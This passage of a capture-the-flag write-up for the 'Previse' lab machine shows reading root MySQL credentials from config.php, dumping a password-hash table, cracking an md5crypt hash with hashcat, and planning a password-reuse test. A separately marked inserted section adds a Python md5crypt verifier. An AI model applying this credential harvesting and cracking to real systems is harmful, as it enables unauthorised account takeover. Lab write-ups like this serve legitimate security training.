Local DB


Both network and process enumeration revealed that the 127.0.0.1:3306 socket on the target system is in use by the mysqld process.

www-data@previse:/var/www/html$ cat config.php
<?php
 
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
 
?>

The DB credential can be found in the config.php file in the web root directory. This file had already been enumerated earlier, since it was part of the website backup archive: root:mySQL_p@ssw0rd!:)

previse


www-data@previse:/var/www/html$ mysql -uroot -p
Enter password: mySQL_p@ssw0rd!:)
 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 82766
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
 
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> 
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| previse            |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
 
mysql> use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
 
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
2 rows in set (0.00 sec)

Connecting to the previse DB shows that there are 2 tables within it.

The previse.files table likely contains the website backup archive, while the previse.accounts table appears to contain user-related data.

previse.accounts


mysql> select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | tester   | $1$🧂llol$9tvmjzdae3enqecghpizb0 | 2023-04-12 11:03:17 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)

I can see the credential for the m4lwhere user.

The password is hashed in a strange manner: the salt string has an emoji in it, $1$🧂llol$. The $1$ prefix identifies md5crypt, which hashcat handles as mode 500.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/previse]
└─$ hashcat -a 0 -m 500 m4lwhere.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!         
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Time.Started.....: Wed Apr 12 14:41:27 2023 (4 mins, 40 secs)
Time.Estimated...: Wed Apr 12 14:46:07 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    25861 H/s (6.85ms) @ Accel:128 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7413504/14344385 (51.68%)
Rejected.........: 0/7413504 (0.00%)
Restore.Point....: 7412736/14344385 (51.68%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: ilovecweg -> ilovecj9/21
Hardware.Mon.#1..: Util: 85%
 
Started: Wed Apr 12 14:41:24 2023
Stopped: Wed Apr 12 14:46:09 2023

It took longer than usual due to the wacky salt applied, but hashcat managed to crack the password hash. The cracked password is ilovecody112235!
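To make the md5crypt ($1$) format concrete and to verify the crack result offline, here is an added Python implementation (not from the original writeup) of the FreeBSD md5crypt algorithm using only hashlib; it checks the cracked password against the stored hash the way a login routine would. It also shows why the emoji salt is unusual: the salt is limited to 8 bytes, and 🧂 alone consumes four of them.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: `count` 6-bit groups, least significant group first."""
    return "".join(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))

def md5crypt(password: str, salt: str) -> str:
    """FreeBSD md5crypt ($1$). The salt is at most 8 *bytes*, so a 4-byte emoji uses half of it."""
    pw = password.encode("utf-8")
    sb = salt.encode("utf-8")[:8]
    ctx = hashlib.md5(pw + b"$1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for pl in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, pl)])
    i = len(pw)
    while i:  # original quirk: feed a NUL or pw[0] for each bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # fixed 1000-round stretching; this is why mode 500 is slow
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in triples)
    return "$1$" + sb.decode("utf-8") + "$" + enc + _to64(final[11], 2)

def verify(candidate: str, stored: str) -> bool:
    """Check a candidate password against '$1$<salt>$<digest>' in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    # compare as bytes: hmac.compare_digest on str only accepts ASCII, and the salt is not
    return hmac.compare_digest(md5crypt(candidate, parts[2]).encode("utf-8"), stored.encode("utf-8"))

# Stored hash from the accounts table above (casing as hashcat printed it); salt = 🧂 + 'llol'.
STORED = "$1$🧂llol$DQpmdvnb7EeuO6UaqRItf."

if __name__ == "__main__":
    print("salt bytes:", STORED.split("$")[2].encode("utf-8"))
    print("ilovecody112235! verifies:", verify("ilovecody112235!", STORED))
```

The crypt base64 alphabet is case-sensitive, so the value to verify against is the one hashcat printed, not a case-folded copy.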

While this password was used for the m4lwhere user on the web application, m4lwhere is also a system user, so I will test it for password reuse.